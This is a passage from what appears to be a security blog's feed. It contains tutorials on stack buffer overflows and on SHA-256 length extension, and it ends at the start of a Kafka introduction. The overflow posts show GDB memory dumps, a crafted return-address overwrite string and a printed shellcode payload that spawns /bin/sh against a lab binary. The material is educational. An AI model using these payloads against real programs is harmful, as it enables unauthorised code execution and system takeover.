underline indicated that). The provided Python code is to implement the design, which saves the output in a file.</p>
<!--kg-card-begin: html-->
<script src="https://gist.github.com/Ex10si0n/cb58bddab7b6857ea4c28585c7ea042f.js"></script>
<!--kg-card-end: html-->
<p>The Python program write a constructed string which is (some of the character are invisible):</p><pre><code>000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000051&#xFFFD;Ph//shh/bin&#xFFFD;&#xFFFD;&#xFFFD;&#xFFFD;&#xB0;
                                                            &#x300;1&#xFFFD;@&#x300;</code></pre><p>By inputing the file content to the vulnerable program, an interactive shell has been gained and the attacker can interact as current user (the process owner).</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://www.aspires.cc/content/images/2024/06/gain-shell.png" class="kg-image" alt="Buffer Overflow Attack from the Ground-up II: Gadget and Shell Code Injection" loading="lazy" width="1960" height="932" srcset="https://www.aspires.cc/content/images/size/w600/2024/06/gain-shell.png 600w, https://www.aspires.cc/content/images/size/w1000/2024/06/gain-shell.png 1000w, https://www.aspires.cc/content/images/size/w1600/2024/06/gain-shell.png 1600w, https://www.aspires.cc/content/images/2024/06/gain-shell.png 1960w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Shell Gained</span></figcaption></figure><h1 id="more-readings">More Readings</h1><p>More chapters is under writing, welcome back</p><figure class="kg-card kg-bookmark-card"><a class="kg-bookmark-container" href="https://www.aspires.cc/buffer-overflow-1/"><div class="kg-bookmark-content"><div class="kg-bookmark-title">Buffer Overflow Attack from the Ground-up I: Simple Overflow</div><div class="kg-bookmark-description">Buffer overflow is a security flaw where data exceeds a buffer&#x2019;s capacity, spilling into neighboring memory. This overflow can corrupt crucial data, causing system instability or even enabling attackers to hijack control.</div><div class="kg-bookmark-metadata"><img class="kg-bookmark-icon" src="https://www.aspires.cc/favicon.ico" alt="Buffer Overflow Attack from the Ground-up II: Gadget and Shell Code Injection"><span class="kg-bookmark-author">The Aspires</span><span class="kg-bookmark-publisher">Ex10si0n Yan</span></div></div><div class="kg-bookmark-thumbnail"><img src="https://www.aspires.cc/content/images/2024/06/buffer-overflow-1.png" alt="Buffer Overflow Attack from the Ground-up II: Gadget and Shell Code Injection"></div></a></figure><figure class="kg-card kg-bookmark-card"><a class="kg-bookmark-container" href="https://www.aspires.cc/buffer-overflow-3/"><div class="kg-bookmark-content"><div class="kg-bookmark-title">Buffer Overflow Attack from the Ground-up III: Canary</div><div class="kg-bookmark-description">To combat buffer overflow attack, the &#x201C;canary&#x201D; stands out as a notable and effective strategy. Canary serves as an early warning system. It is a small, yet crucial, element placed in the stack memory of a program to detect and prevent buffer overflow attacks.</div><div class="kg-bookmark-metadata"><img class="kg-bookmark-icon" src="https://www.aspires.cc/content/images/size/w256h256/2024/06/aspire-mono-margin.png" alt="Buffer Overflow Attack from the Ground-up II: Gadget and Shell Code Injection"><span class="kg-bookmark-author">The Aspires</span><span class="kg-bookmark-publisher">Ex10si0n Yan</span></div></div><div class="kg-bookmark-thumbnail"><img src="https://www.aspires.cc/content/images/2024/06/buffer-overflow-canary.png" alt="Buffer Overflow Attack from the Ground-up II: Gadget and Shell Code Injection"></div></a></figure>]]></content:encoded></item><item><title><![CDATA[Buffer Overflow Attack from the Ground-up I: Simple Overflow]]></title><description><![CDATA[Buffer overflow is a security flaw where data exceeds a buffer’s capacity, spilling into neighboring memory. This overflow can corrupt crucial data, causing system instability or even enabling attackers to hijack control.]]></description><link>https://www.aspires.cc/buffer-overflow-1/</link><guid isPermaLink="false">665ce68183be2400015800bd</guid><category><![CDATA[Security]]></category><dc:creator><![CDATA[Ex10si0n Yan]]></dc:creator><pubDate>Mon, 03 Jun 2024 01:08:35 GMT</pubDate><media:content url="https://www.aspires.cc/content/images/2024/06/buffer-overflow-1.png" medium="image"/><content:encoded><![CDATA[<h1 id="stack-and-heap">Stack and Heap</h1><img src="https://www.aspires.cc/content/images/2024/06/buffer-overflow-1.png" alt="Buffer Overflow Attack from the Ground-up I: Simple Overflow"><p>When a program is running, it is referred to as a process. Processes occupy a portion of the computer&#x2019;s memory, where they store their code, data, and other necessary information required for execution.</p><p>In the context of memory management, <strong>heap</strong> and <strong>stack</strong> refer to different areas of a process&#x2019;s memory, each with distinct purposes and characteristics:</p><h2 id="how-the-stack-works">How the stack works:</h2>
<p>The stack is the reserved memory space for a process to execute. When a function is called, a block is reserved on the newest-end of the stack for <strong>local variables</strong> and some bookkeeping data.</p>
<ol>
<li><strong>Function Calls</strong>: When a function is called, a new block of memory is reserved on top of the stack. This block is used to store the function&#x2019;s local variables and some additional information needed for the function to work.</li>
<li><strong>Returning from Functions</strong>: When the function finishes, its block of memory is no longer needed. This block is freed up and can be reused the next time another function is called.</li>
<li><strong>LIFO Order</strong>: The stack follows a last-in, first-out (LIFO) order. This means that the most recently reserved block of memory is always the first one to be freed.</li>
<li><strong>Upside-down</strong>: The stack is upside-down, where a higher memory address is older and a lower memory address is newer.</li>
</ol>
<h2 id="how-the-heap-works">How the heap works:</h2>
<p>The heap is memory for dynamic allocation. Unlike the stack, there&apos;s no enforced pattern to the allocation and deallocation of blocks from the heap; you can allocate a block at any time and free it at any time. This makes it much more complex to keep track of which parts of the heap are allocated or free at any given time; there are many custom heap allocators available to tune heap performance for different usage patterns  <sup class="footnote-ref"><a href="#fn1" id="fnref1">[1]</a></sup>, i.e., defining <strong>global variables</strong>.</p>
<hr class="footnotes-sep">
<section class="footnotes">
<ol class="footnotes-list">
<li id="fn1" class="footnote-item"><p><a href="https://stackoverflow.com/questions/79923/what-and-where-are-the-stack-and-heap?ref=aspires.cc">https://stackoverflow.com/questions/79923/what-and-where-are-the-stack-and-heap</a> <a href="#fnref1" class="footnote-backref">&#x21A9;&#xFE0E;</a></p>
</li>
</ol>
</section>
<h1 id="stack-based-buffer-overflow">Stack-based Buffer Overflow</h1><p>Unlike Python and Java, some of the built-in functions in C do not perform boundary checks when pushing data into an array (hence, no extra time cost for array manipulation).</p><p>As we mentioned before, local variables (including arrays, which are contiguous blocks of memory that can be accessed via a pointer to the first element) are stored on the stack. When a process is running, the stack grows and shrinks dynamically as functions are called and return. The stack pointer (<strong>ESP</strong> in x86 or <strong>RSP</strong> in x86-64) adjusts to allocate and deallocate stack space.</p><p></p><div class="kg-card kg-toggle-card" data-kg-toggle-state="close">
            <div class="kg-toggle-heading">
                <h4 class="kg-toggle-heading-text"><span style="white-space: pre-wrap;">EBP (Extended Base Pointer)</span></h4>
                <button class="kg-toggle-card-icon" aria-label="Expand toggle to read content">
                    <svg id="Regular" xmlns="http://www.w3.org/2000/svg" viewbox="0 0 24 24">
                        <path class="cls-1" d="M23.25,7.311,12.53,18.03a.749.749,0,0,1-1.06,0L.75,7.311"/>
                    </svg>
                </button>
            </div>
            <div class="kg-toggle-content"><p><span style="white-space: pre-wrap;">When a function is called, the current value of the stack pointer (ESP) is typically saved in the base pointer (EBP), and the ESP is adjusted to allocate space for the function&apos;s stack frame, moving downwards (to lower) in memory.</span></p><p><span style="white-space: pre-wrap;">This allows the function to access its parameters and local variables relative to a fixed reference point, even as the stack pointer changes during the function&#x2019;s execution.</span></p></div>
        </div><p>More explicitly, The space between ESP and EBP contains the local variables and possibly other data for the current function&#x2019;s execution.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://www.aspires.cc/content/images/2024/06/stack-diagram-2.png" class="kg-image" alt="Buffer Overflow Attack from the Ground-up I: Simple Overflow" loading="lazy" width="1770" height="984" srcset="https://www.aspires.cc/content/images/size/w600/2024/06/stack-diagram-2.png 600w, https://www.aspires.cc/content/images/size/w1000/2024/06/stack-diagram-2.png 1000w, https://www.aspires.cc/content/images/size/w1600/2024/06/stack-diagram-2.png 1600w, https://www.aspires.cc/content/images/2024/06/stack-diagram-2.png 1770w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Stack Diagram</span></figcaption></figure><p>The return address is allocated at an <u>important</u> part of the stack. The return address is where the function returns after it is completely executed. </p><p>If the function is called by the main function, the return address should point to the place in the main function immediately after calling this function. If a function is called recursively, such as when an outer function calls an inner function, the return address of the inner function is the place immediately after the call instruction in the outer function, not the inner function itself. Therefore, some high-level programming languages impose a maximum recursion depth to prevent excessive allocation of stack space.</p><p>Let&apos;s take a look at the following example.</p>
<!--kg-card-begin: html-->
<script src="https://gist.github.com/Ex10si0n/921c859d0e19c0c98f1288e55400a056.js"></script>
<!--kg-card-end: html-->
<p>The code works like the <code>cat</code>command in Linux, outputting whatever the user inputs. However, a buffer was declared inside the <code>vuln()</code> function without applying a boundary check. This enables attackers to overwrite the stack memory beyond the allocated buffer size.</p><p>Given the <code>vuln()</code> function&#x2019;s buffer overflow vulnerability, an attacker could potentially:</p><ul><li>Provide an input longer than 148 characters to overflow <code>buf</code>.</li><li>Overwrite the return address of <code>vuln()</code> to point to the <code>win()</code> function&#x2019;s address.</li><li>When <code>vuln()</code> returns, instead of returning to the caller <code>main</code>, it would jump to the <code>win()</code> function, thereby executing the <code>win()</code> function and potentially printing the contents of &#x201C;flag.txt&#x201D;.</li></ul><figure class="kg-card kg-image-card"><img src="https://www.aspires.cc/content/images/2024/06/simple-overflow-1.png" class="kg-image" alt="Buffer Overflow Attack from the Ground-up I: Simple Overflow" loading="lazy" width="1494" height="762" srcset="https://www.aspires.cc/content/images/size/w600/2024/06/simple-overflow-1.png 600w, https://www.aspires.cc/content/images/size/w1000/2024/06/simple-overflow-1.png 1000w, https://www.aspires.cc/content/images/2024/06/simple-overflow-1.png 1494w" sizes="(min-width: 720px) 720px"></figure><p>We need to disassembly the compiled binary, then we can easily check the memory address of the return address <code>ret</code>. Say the binary called <code>vuln</code>, the following command can print out the assembly code for <code>vuln</code>.</p><pre><code class="language-shell">objdump -d ./vuln</code></pre><p>The partial assembly code is shown as follow:</p>
<!--kg-card-begin: html-->
<script src="https://gist.github.com/Ex10si0n/d4cde179b2ec522493b496f139a79394.js"></script>
<!--kg-card-end: html-->
<p>The ret address should be 0x8049390 since it is the bit right after calling <code>vuln()</code>. </p><p>Then we need to use GDB to see what is happened when a user input a string, by setting the GDB break point to 0x80492f4, we can make the process stop after user input. Assume that inputting a non-sense characters <code>1010101012341234</code>, the GDB should log as the previous code block shows.</p><pre><code class="language-gdb">(gdb) b *0x80492f4
Breakpoint 1 at 0x80492f4
(gdb) r
Starting program: /afs/andrew.cmu.edu/usr24/zhongboy/private/14741/b1/vuln
[Thread debugging using libthread_db enabled]
Using host libthread_db library &quot;/lib/x86_64-linux-gnu/libthread_db.so.1&quot;.
Enter a string:

Breakpoint 1, 0x080492f4 in vuln ()
(gdb) nexti
1010101012341234
0x080492f9 in vuln ()</code></pre><p>To see what happens inside the memory, use <code>x/64xw $esp</code>, which means display 64 units of memory formatting as hexadecimal word (4 bytes each) from the ESP pointer.</p><pre><code class="language-gdb">(gdb) x/64xw $esp
0xffffd650:   0xffffd66c  0x000007d4  0x00000011  0x080492e4
0xffffd660:   0xf7ffdba0  0x00000000  0x08048322  0x30313031
0xffffd670:   0x30313031  0x34333231  0x34333231  0xf7ffda00
0xffffd680:   0xffffd6c0  0xf7ffdc0c  0xf7fbe7b0  0x00000001
0xffffd690:   0x00000001  0x00000000  0x00000011  0x00000001
0xffffd6a0:   0x00000001  0x00000000  0xf7ffd000  0x08048308
0xffffd6b0:   0x0804c00c  0x00000001  0xffffd6f8  0xf7f7ea60
0xffffd6c0:   0xf7f80da0  0xf7f80000  0xffffd6f8  0xf7dc748c
0xffffd6d0:   0xf7f80da0  0x0804c000  0xffffd7f4  0xf7ffcb80
0xffffd6e0:   0xffffd728  0xf7fd9004  0x00000001  0x0804c000
0xffffd6f0:   0xffffd7f4  0xf7ffcb80  0xffffd728  0x08049388
0xffffd700:   0xf7f80da0  0x0804c000  0xffffd728  0x08049390
0xffffd710:   0xffffd750  0xf7fbe66c  0xf7fbeb10  0x00000064
0xffffd720:   0xffffd740  0xf7f80000  0xf7ffd020  0xf7d77519
0xffffd730:   0xffffd96b  0x00000070  0xf7ffd000  0xf7d77519
0xffffd740:   0x00000001  0xffffd7f4  0xffffd7fc  0xffffd760</code></pre><p>As illustrated in the block, the ASCII code for the input <code>1010101012341234</code> is indicated using <code>[...]</code>,  which is in little-endian (reversed order).</p><p></p><figure class="kg-card kg-bookmark-card"><a class="kg-bookmark-container" href="https://en.wikipedia.org/wiki/Endianness?ref=aspires.cc"><div class="kg-bookmark-content"><div class="kg-bookmark-title">Endianness - Wikipedia</div><div class="kg-bookmark-description"></div><div class="kg-bookmark-metadata"><img class="kg-bookmark-icon" src="https://en.wikipedia.org/static/apple-touch/wikipedia.png" alt="Buffer Overflow Attack from the Ground-up I: Simple Overflow"><span class="kg-bookmark-author">Wikimedia Foundation, Inc.</span><span class="kg-bookmark-publisher">Contributors to Wikimedia projects</span></div></div><div class="kg-bookmark-thumbnail"><img src="https://upload.wikimedia.org/wikipedia/commons/4/43/Gullivers_travels.jpg" alt="Buffer Overflow Attack from the Ground-up I: Simple Overflow"></div></a></figure><div class="kg-card kg-toggle-card" data-kg-toggle-state="close">
            <div class="kg-toggle-heading">
                <h4 class="kg-toggle-heading-text"><span style="white-space: pre-wrap;">Endianness</span></h4>
                <button class="kg-toggle-card-icon" aria-label="Expand toggle to read content">
                    <svg id="Regular" xmlns="http://www.w3.org/2000/svg" viewbox="0 0 24 24">
                        <path class="cls-1" d="M23.25,7.311,12.53,18.03a.749.749,0,0,1-1.06,0L.75,7.311"/>
                    </svg>
                </button>
            </div>
            <div class="kg-toggle-content"><p><span style="white-space: pre-wrap;">Endianness refers to the order in which bytes are arranged in memory to represent larger data types (such as integers). There are two primary types of endianness:</span></p><ul><li value="1"><b><strong style="white-space: pre-wrap;">Big-endian</strong></b></li></ul><p><span style="white-space: pre-wrap;">In big-endian format, the most significant byte (the &#x201C;big end&#x201D;) is stored at the smallest memory address, and the least significant byte is stored at the largest memory address.</span></p><ul><li value="1"><b><strong style="white-space: pre-wrap;">Little-endian</strong></b></li></ul><p><span style="white-space: pre-wrap;">In little-endian format, the least significant byte (the &#x201C;little end&#x201D;) is stored at the smallest memory address, and the most significant byte is stored at the largest memory address.</span></p></div>
        </div><p>The return address is indicated using <code>(...)</code>.</p>
<!--kg-card-begin: html-->
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <style>
        .highlight-yellow {
            background-color: yellow;
        }
        .highlight-green {
            background-color: lightgreen;
        }
    </style>
</head>
<body>
    <pre>
0xffffd650:   0xffffd66c  0x000007d4  0x00000011  0x080492e4
0xffffd660:   0xf7ffdba0  0x00000000  0x08048322 <span class="highlight-yellow">[0x30313031</span>
0xffffd670:   <span class="highlight-yellow">0x30313031  0x34333231  0x34333231]</span> 0xf7ffda00
0xffffd680:   0xffffd6c0  0xf7ffdc0c  0xf7fbe7b0  0x00000001
0xffffd690:   0x00000001  0x00000000  0x00000011  0x00000001
0xffffd6a0:   0x00000001  0x00000000  0xf7ffd000  0x08048308
0xffffd6b0:   0x0804c00c  0x00000001  0xffffd6f8  0xf7f7ea60
0xffffd6c0:   0xf7f80da0  0xf7f80000  0xffffd6f8  0xf7dc748c
0xffffd6d0:   0xf7f80da0  0x0804c000  0xffffd7f4  0xf7ffcb80
0xffffd6e0:   0xffffd728  0xf7fd9004  0x00000001  0x0804c000
0xffffd6f0:   0xffffd7f4  0xf7ffcb80  0xffffd728  0x08049388
0xffffd700:   0xf7f80da0  0x0804c000  0xffffd728 <span class="highlight-green">(0x08049390)</span>
0xffffd710:   0xffffd750  0xf7fbe66c  0xf7fbeb10  0x00000064
0xffffd720:   0xffffd740  0xf7f80000  0xf7ffd020  0xf7d77519
0xffffd730:   0xffffd96b  0x00000070  0xf7ffd000  0xf7d77519
0xffffd740:   0x00000001  0xffffd7f4  0xffffd7fc  0xffffd760
    </pre>
</body>
</html>
<!--kg-card-end: html-->
<p>To overflow the buffer and overwrite the return address, we can construct an input string using Python (the code is shown as follows) to make the memory like this:</p>
<!--kg-card-begin: html-->
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <style>
        .highlight-yellow {
            background-color: yellow;
        }
        .highlight-green {
            background-color: lightgreen;
        }
    </style>
</head>
<body>
    <pre>
0xffffd650:   0xffffd66c  0x000007d4  0x00000011  0x080492e4
0xffffd660:   0xf7ffdba0  0x00000000  0x08048322 <span class="highlight-yellow">[0x30313031</span>
0xffffd670:   <span class="highlight-yellow">0x31313131  0x31313131  0x31313131  0x31313131</span>
0xffffd680:   <span class="highlight-yellow">0x31313131  0x31313131  0x31313131  0x31313131</span>
0xffffd690:   <span class="highlight-yellow">0x31313131  0x31313131  0x31313131  0x31313131</span>
0xffffd6a0:   <span class="highlight-yellow">0x31313131  0x31313131  0x31313131  0x31313131</span>
0xffffd6b0:   <span class="highlight-yellow">0x31313131  0x31313131  0x31313131  0x31313131</span>
0xffffd6c0:   <span class="highlight-yellow">0x31313131  0x31313131  0x31313131  0x31313131</span>
0xffffd6d0:   <span class="highlight-yellow">0x31313131  0x31313131  0x31313131  0x31313131</span>
0xffffd6e0:   <span class="highlight-yellow">0x31313131  0x31313131  0x31313131  0x31313131</span>
0xffffd6f0:   <span class="highlight-yellow">0x31313131  0x31313131  0x31313131  0x31313131</span>
0xffffd700:   <span class="highlight-yellow">0x31313131  0x31313131  0x31313131 (0x08049256)</span>
0xffffd710:   0xffffd750  0xf7fbe66c  0xf7fbeb10  0x00000064
0xffffd720:   0xffffd740  0xf7f80000  0xf7ffd020  0xf7d77519
0xffffd730:   0xffffd96b  0x00000070  0xf7ffd000  0xf7d77519
0xffffd740:   0x00000001  0xffffd7f4  0xffffd7fc  0xffffd760
    </pre>
</body>
</html>
<!--kg-card-end: html-->

<!--kg-card-begin: html-->
<script src="https://gist.github.com/Ex10si0n/3fa9005d184a043a97cfcb7aeef81c98.js"></script>
<!--kg-card-end: html-->
<p>The string in binary is: <code>0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000V&#x92;</code></p><p>Bingo! When we input this &apos;evil&apos; string (some characters may not show up) into the program, it will display the content of <code>flag.txt</code>.</p><h1 id="more-readings">More Readings</h1><figure class="kg-card kg-bookmark-card"><a class="kg-bookmark-container" href="https://www.aspires.cc/buffer-overflow-2/"><div class="kg-bookmark-content"><div class="kg-bookmark-title">Buffer Overflow Attack from the Ground-up II: Gadget and Shell Code Injection</div><div class="kg-bookmark-description">The previous post introduced the heap, stack, and buffer overflow on the stack using disassembly and GDB. In &#x2018;Buffer Overflow Attack from the Ground-Up II,&#x2019; I will show how to hijack the shell and control the system through the vulnerable program.</div><div class="kg-bookmark-metadata"><img class="kg-bookmark-icon" src="https://www.aspires.cc/favicon.ico" alt="Buffer Overflow Attack from the Ground-up I: Simple Overflow"><span class="kg-bookmark-author">The Aspires</span><span class="kg-bookmark-publisher">Ex10si0n Yan</span></div></div><div class="kg-bookmark-thumbnail"><img src="https://www.aspires.cc/content/images/2024/06/buffer-overflow-gadget-1.png" alt="Buffer Overflow Attack from the Ground-up I: Simple Overflow"></div></a></figure><figure class="kg-card kg-bookmark-card"><a class="kg-bookmark-container" href="https://www.aspires.cc/buffer-overflow-3/"><div class="kg-bookmark-content"><div class="kg-bookmark-title">Buffer Overflow Attack from the Ground-up III: Canary</div><div class="kg-bookmark-description">To combat buffer overflow attack, the &#x201C;canary&#x201D; stands out as a notable and effective strategy. Canary serves as an early warning system. It is a small, yet crucial, element placed in the stack memory of a program to detect and prevent buffer overflow attacks.</div><div class="kg-bookmark-metadata"><img class="kg-bookmark-icon" src="https://www.aspires.cc/content/images/size/w256h256/2024/06/aspire-mono-margin.png" alt="Buffer Overflow Attack from the Ground-up I: Simple Overflow"><span class="kg-bookmark-author">The Aspires</span><span class="kg-bookmark-publisher">Ex10si0n Yan</span></div></div><div class="kg-bookmark-thumbnail"><img src="https://www.aspires.cc/content/images/2024/06/buffer-overflow-canary.png" alt="Buffer Overflow Attack from the Ground-up I: Simple Overflow"></div></a></figure><p>Buffer Overflow Attack from the Ground-up IV: Return to Libc</p>]]></content:encoded></item><item><title><![CDATA[An Introduction to SHA256 Hash Extension Attack]]></title><description><![CDATA[SHA-256 extension attack enables attacker to easily append additional data to an existing message and generate a new valid hash value for the extended message without needing to know the original message content.]]></description><link>https://www.aspires.cc/hash-extension/</link><guid isPermaLink="false">664d057ae3c8d7000185704c</guid><category><![CDATA[Security]]></category><dc:creator><![CDATA[Ex10si0n Yan]]></dc:creator><pubDate>Wed, 22 May 2024 04:02:43 GMT</pubDate><media:content url="https://www.aspires.cc/content/images/2024/05/hash-extension.png" medium="image"/><content:encoded><![CDATA[<img src="https://www.aspires.cc/content/images/2024/05/hash-extension.png" alt="An Introduction to SHA256 Hash Extension Attack"><p><strong>TLDR;</strong> A SHA-256 extension attack can create a new hash value for a modified message without knowledge of the original message.&#xA0;</p><p>SHA-256 works by taking an input message and processing it through a series of flow operations to produce a fixed-size (256-bit) output, known as the hash value or digest. This output is typically represented as a 64-character hexadecimal number (each character represents 4 bits, ranging from <code>0x0000</code> to <code>0x1111</code>), used to verify the integrity and authenticity of the input data.</p><p>If digital signatures are not used to protect the integrity of the SHA-256 hash value, an attacker can easily append additional data to an existing message (right after the original hash value) and generate a new valid hash value for the extended message without needing to know the original message content. This technique is known as a SHA-256 extension attack.</p><p>Here is an example: a system manager sends a YAML file with a SHA-256 digest to the server, and the server program can assign users specified in the YAML to the system.</p><p>The system is required to verify that the hash value of the received YAML is the same as the hash value from the sender&apos;s side in order to ensure integrity.</p><p>The system manager sends a YAML file contains:</p>
<!--kg-card-begin: html-->
<script src="https://gist.github.com/Ex10si0n/e5b8af881aeca0d6e2eae5ba635d8aba.js"></script>
<!--kg-card-end: html-->
<p>The corresponding SHA-256 digest for this plain text is:</p><pre><code>b3318b395ecbea550974e6558a782971262af8f786af4f01e8f8a2ba18bc1102</code></pre><p>Charlie, the man-in-the-middle, can only write bytes to the YAML and read the digest. He can use an extension attack to modify the YAML (without reading it) and the hash to forge a modified YAML and the corresponding hash digest. He can then encapsulate the forged message and send it to the receiver to gain access privileges.</p><p>The following YAML has been modified by Charlie; he some characters to declare an access privilege, although he cannot see the message.</p>
<!--kg-card-begin: html-->
<script src="https://gist.github.com/Ex10si0n/be86c9aa6d01a796a32374ff093aaf1f.js"></script>
<!--kg-card-end: html-->
<p>Charlie can generate the corresponding SHA-256 digest for the new message and then send it to the receiver to deceive them.</p><pre><code>a40cf7232a3e7065cbab6d70a76328143b30a519ecca5a626b8b77f3c6c4924e</code></pre><p>Charlie successfully exploit the server by modifying both YAML and the digest with the help of hash extension attack.</p><p>The following paragraphs will introduce you to the technique and implementation for the extension attack.</p><h1 id="the-sha-256-padding-algorithm">The SHA-256 Padding Algorithm</h1><p>Before running into the hash algorithm, message should be padded to length by a multiple of 64 bytes. As an example, for the padding of the message <code>helloworld</code>.</p><p>The hexadecimal value (ASCII) for <code>helloworld</code> is</p><pre><code>68 65 6c 6c 6f 77 6f 72 6c 64
^  ^  ^  ^  ^  ^  ^  ^  ^  ^
h  e  l  l  o  w  o  r  l  d
length = 10</code></pre><p><strong>The first step</strong> is to append a <code>0x80</code> to the hexadecimal value.</p><pre><code>68 65 6c 6c 6f 77 6f 72 6c 64 80</code></pre><p><strong>The second step</strong> is to append many <code>0x00</code> until length equals to $n \times 64 - 8$, where $n &gt; 0$.</p><pre><code>68 65 6c 6c 6f 77 6f 72 6c 64 80 00 ....... 00
                                 | count: 45 |
length = 56</code></pre><p><strong>The final step</strong> is to append 8 bytes as the length indicator of the original message ($10$ bytes = $80$ bits = $50_{16}$ bits).</p><pre><code>68 65 6c 6c 6f 77 6f 72 6c 64 80 00 ....... 00 80
                                 | count: 52 |
length = 64</code></pre><h1 id="sha-256">SHA-256</h1><p>The SHA-256 hash is a non-reversible hash function, which works by 8 hashing values ([h]), say h0, h1, ... to h7. The value of each [h] is initialized to a specific value. As illustrated in the Figure.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://www.aspires.cc/content/images/2024/05/sha-256-blocks.png" class="kg-image" alt="An Introduction to SHA256 Hash Extension Attack" loading="lazy" width="1682" height="1300" srcset="https://www.aspires.cc/content/images/size/w600/2024/05/sha-256-blocks.png 600w, https://www.aspires.cc/content/images/size/w1000/2024/05/sha-256-blocks.png 1000w, https://www.aspires.cc/content/images/size/w1600/2024/05/sha-256-blocks.png 1600w, https://www.aspires.cc/content/images/2024/05/sha-256-blocks.png 1682w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">SHA-256</span></figcaption></figure><p>The padded message is then divided into n 64-byte blocks (n=3 in this example, where n depends on the length of the message), named [block1], [block2], and [block3]. The hash algorithm then processes each block sequentially, applying the compression function <code>F</code> to each block and updating the h values. </p>
<!--kg-card-begin: html-->
<script src="https://gist.github.com/Ex10si0n/855c0616c1703cc9a893490011de6b6e.js"></script>
<!--kg-card-end: html-->
<p>The code illustrates the compression function <code>F</code>. The final hash value is obtained by concatenating the eight h values after processing all blocks with the compression function.&#xA0;The initial h values are typically:</p><pre><code>h0 = 0x6a09e667
h1 = 0xbb67ae85
h2 = 0x3c6ef372
h3 = 0xa54ff53a
h4 = 0x510e527f
h5 = 0x9b05688c
h6 = 0x1f83d9ab
h7 = 0x5be0cd19</code></pre><p>These values go through the <code>F</code> function, and the function updates the h values (block-wise) with the block input, finally outputting the h values. These h values constitute the hash digest.</p><h1 id="merkle%E2%80%93damg%C3%A5rd-length-extension-attack">Merkle&#x2013;Damg&#xE5;rd Length Extension Attack</h1><p>The Merkle&#x2013;Damg&#xE5;rd length extension attack forges a new message hash that is an extension of the original message. Since the output is the concatenation of h values, SHA-256 uses h values to feed into the algorithm and generate the hash digest.</p><p>The original message the system manager sent firstly goes through the SHA-256 hash algorithm and gets a hash value. This hash value is then used as the initial hash value for the extension message: <code>, charlie</code>, which is then processed by the SHA256 hash algorithm. A final hash value is then generated.</p><p>Mentioned that the original message is padded and appended with length follows the padding algorithm:</p><pre><code>name: alice, bob&lt;0x80&gt;&lt;0x00&gt;..&lt;0x00&gt;&lt;length&gt;</code></pre><p>Since there will be only one padding and length running into the hash function <code>F</code>, the original padding and length for the message &quot;ends with <code>bob</code>&quot; will be garbage characters. Therefore, we need to reconstruct the new padding and length through manual calculation in order to feed them into the hash function <code>F</code>.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://www.aspires.cc/content/images/2024/05/hash-extension-handwritten.png" class="kg-image" alt="An Introduction to SHA256 Hash Extension Attack" loading="lazy" width="1714" height="816" srcset="https://www.aspires.cc/content/images/size/w600/2024/05/hash-extension-handwritten.png 600w, https://www.aspires.cc/content/images/size/w1000/2024/05/hash-extension-handwritten.png 1000w, https://www.aspires.cc/content/images/size/w1600/2024/05/hash-extension-handwritten.png 1600w, https://www.aspires.cc/content/images/2024/05/hash-extension-handwritten.png 1714w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Calculation of Length</span></figcaption></figure><p>The new length can be calculated using the previous length. We need to obtain the length of the previous message from metadata in order to calculate the new length accurately.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://www.aspires.cc/content/images/2024/05/sha-256-blocks.png" class="kg-image" alt="An Introduction to SHA256 Hash Extension Attack" loading="lazy" width="1682" height="1300" srcset="https://www.aspires.cc/content/images/size/w600/2024/05/sha-256-blocks.png 600w, https://www.aspires.cc/content/images/size/w1000/2024/05/sha-256-blocks.png 1000w, https://www.aspires.cc/content/images/size/w1600/2024/05/sha-256-blocks.png 1600w, https://www.aspires.cc/content/images/2024/05/sha-256-blocks.png 1682w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">SHA-256</span></figcaption></figure><p>The message block to be fed into the extension <code>F</code> (right most) is:</p><pre><code>name: alice, bob&lt;0x80&gt;&lt;0x00&gt;..&lt;0x00&gt;&lt;length&gt;, charlie&lt;0x80&gt;&lt;0x00&gt;...&lt;0x00&gt;&lt;new_length&gt;</code></pre><p>where, <code>alice</code>, <code>bob&lt;0x80&gt;&lt;0x00&gt;..&lt;0x00&gt;&lt;length&gt;</code>, and <code>charlie</code> will be counted as three users to be added as the root user to the system.</p><p>In conclusion, a hash extension attack is a type of attack where an attacker is able to calculate the hash value of a longer message based on the hash value of a shorter message and some additional information. By exploiting the structure of certain hash functions, an attacker can append data to the original message and generate a valid hash value for the extended message without knowing the original message content. This type of attack highlights the importance of using secure hash functions that are resilient against such attacks.</p>]]></content:encoded></item><item><title><![CDATA[An Introduction to Kafka and Samza for Stream Data Processing]]></title><description><![CDATA[Kafka and Samza, developed by Apache Software Foundation, process real-time data like location data from Uber. Kafka feeds raw data to a distributed queue, and Samza performs tasks like Uber passenger-driver matching.]]></description><link>https://www.aspires.cc/intro-stream-data-processing/</link><guid isPermaLink="false">66497323da27ac0001efd642</guid><category><![CDATA[Big Data]]></category><dc:creator><![CDATA[Ex10si0n Yan]]></dc:creator><pubDate>Sun, 14 Apr 2024 19:52:00 GMT</pubDate><media:content url="https://www.aspires.cc/content/images/2024/05/kafka-samza.png" medium="image"/><content:encoded><![CDATA[<blockquote><strong>In which cases should we use Kafka and Samza?</strong><br>By leveraging the scalability of a stream processing cluster, Kafka and Samza excel at handling high-volume and low-latency data streams. They are well-suited for processing real-time data collected by IoT devices or as a part of an OLAP system.</blockquote><img src="https://www.aspires.cc/content/images/2024/05/kafka-samza.png" alt="An Introduction to Kafka and Samza for Stream Data Processing"><p>Kafka is a&#xA0;<strong>distributed</strong>&#xA0;event streaming platform that is used for building real-time data pipelines and streaming applications. It is commonly used for collecting, storing, and processing large amounts of data in real-time.</p><div class="kg-card kg-toggle-card" 